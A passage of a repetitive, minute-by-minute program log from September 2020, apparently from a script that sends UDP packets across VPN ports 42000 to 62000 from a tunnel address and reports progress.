size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:09:05 -Starting port fill at 2020-09-06 13:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:10:04 -Starting port fill at 2020-09-06 13:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:11:04 -Starting port fill at 2020-09-06 13:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 13:12:06 -Starting port fill at 2020-09-06 13:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:13:05 -Starting port fill at 2020-09-06 13:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:14:05 -Starting port fill at 2020-09-06 13:15:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:15:06 -Starting port fill at 2020-09-06 13:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:16:05 -Starting port fill at 2020-09-06 13:17:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:17:05 -Starting port fill at 2020-09-06 13:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:18:05 -Starting port fill at 2020-09-06 13:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:19:05 -Starting port fill at 2020-09-06 13:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:20:05 -Starting port fill at 2020-09-06 13:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:21:06 -Starting port fill at 2020-09-06 13:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:22:04 -Starting port fill at 2020-09-06 13:23:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:23:04 -Starting port fill at 2020-09-06 13:24:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:24:04 -Starting port fill at 2020-09-06 13:25:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:25:04 -Starting port fill at 2020-09-06 13:26:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 13:26:06 -Starting port fill at 2020-09-06 13:27:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:27:04 -Starting port fill at 2020-09-06 13:28:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:28:04 -Starting port fill at 2020-09-06 13:29:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:29:04 -Starting port fill at 2020-09-06 13:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:30:04 -Starting port fill at 2020-09-06 13:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 